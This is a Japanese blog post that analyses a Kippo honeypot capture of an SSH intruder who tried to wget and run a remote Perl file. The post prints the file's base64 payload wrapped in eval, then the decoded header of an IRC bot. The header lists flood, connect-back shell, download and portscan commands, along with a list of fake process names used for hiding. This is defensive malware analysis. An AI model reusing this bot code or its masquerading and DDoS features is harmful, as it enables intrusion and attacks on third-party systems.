SSH不正侵入、観察日記

不正アクセスを観測したのでご紹介。

動画を見ていただこう。

[kippo_log.gif]

なにやら不正ファイルをwgetして実行しようとしてる。

Kippoは、侵入者がwgetしたファイルを、dl ディレクトリに全て格納してくれるので今回は実際に不審なファイルの中身を見てみよう。

中身を覗いてみる。

encodeされていたので、見た目では、なにをするものなんかはわからない。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# more  dl/20150709223030_http___erixx_altervista_org_new_txt
#!/usr/bin/perl
use MIME::Base64;
eval (decode_base64('IyEvdXNyL2Jpbi9wZXJsDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI
yMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyM
jIyMjIyMjIyMjIyMNCiMjICBMaW51eC1IZWxwIFBlcmwgSXJjQm90IHYxLjAgLyAyMDEzIGJ5IExpbnV4LWhlbH
AgQCBVbmRlck5ldCAgICAgICAgICMjIFsgSGVscCBdICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI
yMjIyMjIyMjIyMNCiMjICAgICAgU3RlYWx0aCBNdWx0aUZ1bmN0aW9uYWwgSXJjQm90IHdyaXRlbiBpbiBQZXJs
ICAgICAgICAgICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyM
NCiMjICAgICAgICBUZXN0ZSBvbiBldmVyeSBzeXN0ZW0gd2l0aCBQRVJMIGluc3RsbGVkICAgICAgICAgICAgIC
MjICAhdSBAc3lzdGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyMNCiMjICAgICAgI
CAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMjICAhdSBAdmVy
c2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyMNCiMjICAgICBUaGlzIGlzIGEgZnJ
lZSBwcm9ncmFtIHVzZWQgb24geW91ciBvd24gcmlzay4gICAgICAgICAgICMjICAhdSBAY2hhbm5lbCAgICAgIC
AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyMNCiMjICAgICAgICBDcmVhdGVkIGZvciBlZHVjYXRp

そこで、スクリプトの中で、 evalprint に修正して、本スクリプトを実行する。
するとなにやらソースがでてきた。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#!/usr/bin/perl

######################################################################################################################
######################################################################################################################
##  Linux-Help Perl IrcBot v1.0 / 2013 by Linux-help @ UnderNet         ## [ Help ] ###########################################
##      Stealth MultiFunctional IrcBot writen in Perl          #######################################################
##        Teste on every system with PERL instlled             ##  !u @system                                       ##
##                                                             ##  !u @version                                      ##
##     This is a free program used on your own risk.           ##  !u @channel                                      ##
##        Created for educational purpose only.                ##  !u @flood                                        ##
## I'm not responsible for the illegal use of this program.    ##  !u @utils                                        ##
######################################################################################################################
## [ Channel ] #################### [ Flood ] ################################## [ Utils ] ###########################
######################################################################################################################
##  !u @join <#channel>          ##  !u @udp1 <ip> <port> <time>              ##  !u @cback <ip> <port>             ##
##  !u @part <#channel>          ##  !u @udp2 <ip> <packet size> <time>       ##  !u @downlod <url+path> <file>     ##
##  !u !uejoin <#channel>        ##  !u @udp3 <ip> <port> <time>              ##  !u @portscan <ip>                 ##
##  !u !op <channel> <nick>      ##  !u @tcp <ip> <port> <packet size> <time> ##  !u @mail <subject> <sender>       ##
##  !u !deop <channel> <nick>    ##  !u @http <site> <time>                   ##           <recipient> <message>    ##
##  !u !voice <channel> <nick>   ##                                           ##  !u pwd;uname -a;id <for example>  ##
##  !u !devoice <channel> <nick> ##  !u @ctcpflood <nick>                     ##  !u @port <ip> <port>              ##
##  !u !nick <newnick>           ##  !u @msgflood <nick>                      ##  !u @dns <ip/host>                 ##
##  !u !msg <nick>               ##  !u @noticeflood <nick>                   ##                                    ##
##  !u !quit                     ##                                           ##                                    ##
##  !u !uaw                      ##                                           ##                                    ##
##  !u @die                      ##                                           ##                                    ##
##                               ##                                           ##                                    ##
######################################################################################################################
######################################################################################################################

#############################
##### [ Configuration ] #####
#############################

my @rps = ("/usr/local/apache/bin/httpd -DSSL",
           "/usr/sbin/httpd -k start -DSSL",
           "/usr/sbin/httpd",
           "/usr/sbin/sshd -i",
           "/usr/sbin/sshd",
           "/usr/sbin/sshd -D",
           "/usr/sbin/apache2 -k start",
           "/sbin/syslogd",
           "/sbin/klogd -c 1 -x -x",
           "/usr/sbin/acpid",
           "/usr/sbin/cron");
my $process = $rps[rand scalar @rps];

IRCBOTだった。 プロセスは偽装している。
ハニーポット観察記録 番外編 〜IRCBOT はプロセスの名前を騙るのか?〜 と同じスクリプトのようだ。